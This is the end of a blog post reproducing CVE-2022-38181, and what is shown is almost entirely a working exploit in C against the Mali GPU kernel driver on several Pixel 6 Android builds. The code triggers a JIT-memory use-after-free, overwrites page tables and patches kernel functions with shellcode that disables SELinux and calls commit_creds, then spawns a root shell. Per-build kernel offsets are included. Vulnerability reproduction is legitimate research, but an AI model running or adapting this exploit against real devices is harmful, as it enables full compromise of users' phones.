alloc.in.va_pages = SPRAY_PAGES;
alloc.in.commit_pages = 0;
mem_alloc(fd, &alloc);
cookies[j - 32] = alloc.out.gpu_va;
}
for (int j = 32; j < 64; j++) {
void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, fd, cookies[j - 32]);
if (region == MAP_FAILED) {
err(1, "mmap failed");
}
gpu_va[j] = (uint64_t)region;
}
}

uint64_t alias_sprayed_regions(int mali_fd) {
union kbase_ioctl_mem_alias alias = {0};
alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
alias.in.stride = SPRAY_PAGES;

alias.in.nents = SPRAY_NUM;
struct base_mem_aliasing_info ai[SPRAY_NUM];
for (int i = 0; i < SPRAY_NUM; i++){
ai[i].handle.basep.handle = gpu_va[i];
ai[i].length = SPRAY_PAGES;
ai[i].offset = 0;
}
alias.in.aliasing_info = (uint64_t)(&(ai[0]));
mem_alias(mali_fd, &alias);

uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES;
void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
if (region == MAP_FAILED) {
err(1, "mmap alias failed");
}
alias_regions[0] = region;
for (int i = 1; i < SPRAY_NUM; i++) {
void* this_region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)region + i * 0x1000 * SPRAY_PAGES);
if (this_region == MAP_FAILED) {
err(1, "mmap alias failed %d\n", i);
}
alias_regions[i] = this_region;
}
return (uint64_t)region;
}

//=========================== SHELLCODE AREA BEGIN =====================================
#define PAGE_SHIFT 12

#define KERNEL_BASE 0x80000000

#define OVERWRITE_INDEX 256

#define ADRP_INIT_INDEX 0

#define ADD_INIT_INDEX 1

#define ADRP_COMMIT_INDEX 2

#define ADD_COMMIT_INDEX 3

#define AVC_DENY_2108 0x92df1c

#define SEL_READ_ENFORCE_2108 0x942ae4

#define INIT_CRED_2108 0x29a0570

#define COMMIT_CREDS_2108 0x180b0c

#define ADD_INIT_2108 0x9115c000

#define ADD_COMMIT_2108 0x912c3108

#define AVC_DENY_2201 0x930af4

#define SEL_READ_ENFORCE_2201 0x9456bc

#define INIT_CRED_2201 0x29b0570

#define COMMIT_CREDS_2201 0x183df0

#define ADD_INIT_2201 0x9115c000

#define ADD_COMMIT_2201 0x9137c108

#define AVC_DENY_2202 0x930b50

#define SEL_READ_ENFORCE_2202 0x94551c

#define INIT_CRED_2202 0x29b0570

#define COMMIT_CREDS_2202 0x183e3c

#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570

#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c

#define AVC_DENY_2207 0x927664

#define SEL_READ_ENFORCE_2207 0x93bf5c

#define INIT_CRED_2207 0x29e07f0

#define COMMIT_CREDS_2207 0x18629c

#define ADD_INIT_2207 0x911fc000 //add x0, x0, #0x7f0

#define ADD_COMMIT_2207 0x910a7108 //add x8, x8, #0x29c

#define AVC_DENY_2211 0x8d6810

#define SEL_READ_ENFORCE_2211 0x8ea124

#define INIT_CRED_2211 0x2fd1388

#define COMMIT_CREDS_2211 0x17ada4

#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388

#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4

#define AVC_DENY_2212 0x8ba710

#define SEL_READ_ENFORCE_2212 0x8cdfd4

#define INIT_CRED_2212 0x2fd1418

#define COMMIT_CREDS_2212 0x177ee4

#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418

#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4


static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2207;

static uint64_t avc_deny = AVC_DENY_2207;

/*
Overwriting SELinux to permissive
strb wzr, [x0]
mov x0, #0
ret
*/
static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};

static uint32_t root_code[8] = {0};
uint32_t lo32(uint64_t x) {
return x & 0xffffffff;
}

uint32_t hi32(uint64_t x) {
return x >> 32;
}

uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
uint64_t pc_page = pc >> 12;
uint64_t label_page = label >> 12;
int64_t offset = (label_page - pc_page) << 12;
int64_t immhi_mask = 0xffffe0;
int64_t immhi = offset >> 14;
int32_t immlo = (offset >> 12) & 0x3;
uint32_t adpr = rd & 0x1f;
adpr |= (1 << 28);
adpr |= (1 << 31); //op
adpr |= immlo << 29;
adpr |= (immhi_mask & (immhi << 5));
return adpr;
}

void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {

uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
//Sets x0 to init_cred
root_code[ADRP_INIT_INDEX] = init_adpr;
root_code[ADD_INIT_INDEX] = add_init;
//Sets x8 to commit_creds
root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
root_code[ADD_COMMIT_INDEX] = add_commit;
root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
root_code[5] = 0xd63f0100; // blr x8
root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
root_code[7] = 0xd65f03c0; // ret
}

uint64_t set_addr_lv3(uint64_t addr) {
uint64_t pfn = addr >> PAGE_SHIFT;
pfn &= ~ 0x1FFUL;
pfn |= 0x100UL;
return pfn << PAGE_SHIFT;
}

static inline uint64_t compute_pt_index(uint64_t addr, int level) {
uint64_t vpfn = addr >> PAGE_SHIFT;
vpfn >>= (3 - level) * 9;
return vpfn & 0x1FF;
}

void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
void* jc_region = map_gpu(mali_fd, 1, 1, false, 0);
struct MALI_JOB_HEADER jh = {0};
jh.is_64b = true;
jh.type = MALI_JOB_TYPE_WRITE_VALUE;

struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
payload.type = type;
payload.immediate_value = value;
payload.address = gpu_addr;

MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
uint32_t* section = (uint32_t*)jc_region;
struct base_jd_atom_v2 atom = {0};
atom.jc = (uint64_t)jc_region;
atom.atom_number = atom_number;
atom.core_req = BASE_JD_REQ_CS;
struct kbase_ioctl_job_submit submit = {0};
submit.addr = (uint64_t)(&atom);
submit.nr_atoms = 1;
submit.stride = sizeof(struct base_jd_atom_v2);
if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
err(1, "submit job failed\n");
}
usleep(10000);
}

void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
uint64_t curr_overwrite_addr = 0;
for (int i = 0; i < size; i++) {
uint64_t base = reserved[i];
uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
uint64_t start_idx = compute_pt_index(base, 3);
uint64_t end_idx = compute_pt_index(end, 3);
for (uint64_t addr = base; addr < end; addr += 0x1000) {
uint64_t overwrite_addr = set_addr_lv3(addr);
if (curr_overwrite_addr != overwrite_addr) {
LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
curr_overwrite_addr = overwrite_addr;
for (int code = code_size - 1; code >= 0; code--) {
write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
}
usleep(300000);
}
}
}
}

int run_enforce() {
char result = '2';
sleep(3);
int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
read(enforce_fd, &result, 1);
close(enforce_fd);
LOG("result %d\n", result);
return result;
}

void select_offset() {
char fingerprint[256];
int len = __system_property_get("ro.build.fingerprint", fingerprint);
LOG("fingerprint: %s\n", fingerprint);
if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
avc_deny = AVC_DENY_2108;
sel_read_enforce = SEL_READ_ENFORCE_2108;
fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
avc_deny = AVC_DENY_2201;
sel_read_enforce = SEL_READ_ENFORCE_2201;
fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
avc_deny = AVC_DENY_2202;
sel_read_enforce = SEL_READ_ENFORCE_2202;
fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ3A.220705.003/8671607:user/release-keys")) {
avc_deny = AVC_DENY_2207;
sel_read_enforce = SEL_READ_ENFORCE_2207;
fixup_root_shell(INIT_CRED_2207, COMMIT_CREDS_2207, SEL_READ_ENFORCE_2207, ADD_INIT_2207, ADD_COMMIT_2207);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) {
avc_deny = AVC_DENY_2211;
sel_read_enforce = SEL_READ_ENFORCE_2211;
fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) {
avc_deny = AVC_DENY_2212;
sel_read_enforce = SEL_READ_ENFORCE_2212;
fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212);
return;
}

err(1, "unable to match build id\n");
}

void cleanup(int mali_fd, uint64_t pgd) {
write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
}

void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);

usleep(100000);
//Go through the reserve pages addresses to write to avc_denied with our own shellcode
write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));

//Triggers avc_denied to disable SELinux
open("/dev/kmsg", O_RDONLY);

uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);

//Call commit_creds to overwrite process credentials to gain root
write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
}
//=========================== SHELLCODE AREA END ==================================

int trigger(int mali_fd, int mali_fd2, int* flush_idx){
void* gpa_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0);
uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, SPRAY_PAGES, (uint64_t)gpa_alloc_addr);
atom_number++;
print_addr("jit_addr", jit_addr);

printf("[*] put jit_reg into evicted_list\n");
//put jit_node --> evicted_list
mem_flags_change(mali_fd, jit_addr, BASE_MEM_DONT_NEED, 0);

for (int i = 0; i < 100; i++){
union kbase_ioctl_mem_query query= {0};
query.in.gpu_addr = jit_addr;
query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;

// printf("[*] trying to construct memory presure to trigger shrinker\n");
flush_regions[i] = flush(0, i + *flush_idx);
if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0){
migrate_to_cpu(0);
LOG("[*] jit_reg has been realeased by shrinker\n");
spray_mem(mali_fd, 1);

for (int j = 0; j < SPRAY_NUM; j++){
mem_commit(mali_fd,
gpu_va[j], SPRAY_PAGES);
}

LOG("[*] alias all the sprayed regions\n");
uint64_t alias_region_spray = alias_sprayed_regions(mali_fd);
print_addr("alias_region_spray", alias_region_spray);
fault_pages();

for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE);

LOG("[*] make full of mem_pool\n");
uint64_t drain = drain_mem_pool(mali_fd);
release_mem_pool(mali_fd, drain);

LOG("[*] free jit_reg into next_pool\n");
jit_free(mali_fd, atom_number, jit_id);

LOG("[*] spray pgd\n");
map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &reserved[0]);

int freed_idx = find_freed_idx(mali_fd);
if (freed_idx == -1) err(1, "Failed to find freed_idx");
LOG("Found freed_idx %d\n", freed_idx);
int pgd_idx = find_pgd(freed_idx, 0);
if (pgd_idx == -1) err(1, "Failed to find pgd");
uint64_t pgd = alias_region_spray + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000);
LOG("Found pgd %d, %lx\n", pgd_idx, pgd);
atom_number++;

write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
run_enforce();
cleanup(mali_fd, pgd);
return 0;
}
// printf("[+] jit commit_size == %llu\n", query.out.value);
}
LOG("[!] fail exploit and retry...\n");
*flush_idx += 100;
jit_id++;
return -1;
}
int main(){
setbuf(stdout, NULL);
setbuf(stderr, NULL);

//set target
select_offset();

// initial mali_fd
mali_fd = open_dev(MALI_PATH);
mali_fd2 = open_dev(MALI_PATH);
setup_mali(mali_fd, 0);
setup_mali(mali_fd2, 1);
setup_tracking_page(mali_fd);
setup_tracking_page(mali_fd2);

//set trim_level = 100 which means new_size = old_pages
LOG("[*] jit_reg init\n");
jit_init(mali_fd, 0x100, 100, 0);

// prepare resserved page to alloc pgd from next_pool
reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE / RESERVED_SIZE, &reserved[0], 1);

printf("[+] reserved[0] == 0x%lx\n", reserved[0]);

int flush_idx = 0;
for (int i = 0; i < 10; i++){
if(!trigger(mali_fd, mali_fd2, &flush_idx)){
system("sh");
break;
}
}
return -1;
}
  • Title: Mali GPU CVE-2022-38181 漏洞复现
  • Author: henry
  • Created at : 2024-12-11 20:56:30
  • Updated at : 2024-12-11 20:59:29
  • Link: https://henrymartin262.github.io/2024/12/11/CVE-2022-38181/
  • License: This work is licensed under CC BY-NC-SA 4.0.
 Comments